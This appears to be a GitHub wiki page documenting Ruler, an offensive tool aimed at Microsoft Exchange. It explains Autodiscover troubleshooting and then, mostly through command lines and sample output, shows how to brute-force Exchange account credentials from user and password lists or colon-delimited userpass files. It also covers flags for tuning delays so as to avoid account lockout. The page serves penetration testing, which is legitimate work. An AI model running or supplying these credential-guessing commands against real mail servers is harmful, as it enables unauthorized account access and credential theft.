Skip to content

Brute Force

Jump to bottom
Dominic White edited this page Dec 2, 2019 · 3 revisions

Understanding Autodiscover

While Ruler makes a best effort to "autodiscover" the necessary settings, you may still run into instances of it failing. The common causes are:

  • autodiscover deployed over http and not https (we default to https as this is more common)
  • No autodiscover DNS record
  • Authentication failing

If you encounter an Exchange server where the Autodiscover service is failing, you can manually specify the Autodiscover URL:

./ruler --url http://autodiscover.somedomain.com/autodiscover/autodiscover.xml

If you run into issues with Authentication (and you know the creds are correct), you can try and force the use of basic authentication with the global --basic

The global --verbose flag will also give you some insight into the process being used by the autodiscover service.

Brute-force for credentials

If you go the brute-force route, Ruler is your friend. It has a built-in brute-forcer which does a semi-decent job of finding creds.

./ruler --domain targetdomain.com brute --users /path/to/user.txt --passwords /path/to/passwords.txt

You should see your brute-force in action:

./ruler --domain evilcorp.ninja --insecure brute --users ~/users.txt --passwords ~/passwords.txt --delay 0 --verbose

[*] Starting bruteforce
[x] Failed: bob.dole:P@ssw0rd
[x] Failed: george.bush:P@ssw0rd
[x] Failed: bill.clinton:P@ssw0rd
[x] Failed: bob.dole:August2016
[x] Failed: george.bush:August2016
[+] Success: bill.clinton:August2016
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: bob.dole:Evilcorp@2016
[x] Failed: george.bush:Evilcorp@2016
[x] Failed: bob.dole:3V1lc0rp
[x] Failed: george.bush:3V1lc0rp
[*] Multiple attempts. To prevent lockout - delaying for 0 minutes.
[x] Failed: george.bush:Password1
[+] Success: bob.dole:Password1

Alternatively, you can specify a userpass file with the --userpass option. The userpass file should be colon-delimited with one pair of credentials per line:

$ cat userpass.txt
bill.clinton:August2016
george.bush:Password!2016
bob.dole:Password1

./ruler --domain evilcorp.ninja --insecure brute --userpass userpass.txt -v

[*] Starting bruteforce
[+] Success: bill.clinton:August2016
[x] Failed: george.bush:Password!2016
[+] Success: bob.dole:Password1

There are a few other flags that work with brute

These are:

  • --stop //stop on the first valid username:password combo
  • --delay //how long to wait between multiple password guesses
  • --attempts //how many attempts before we delay (attempts per user)
  • --insecure //if the Exchange server has a bad SSL cerificate
  • --verbose //be verbose and show failed attempts
Clone this wiki locally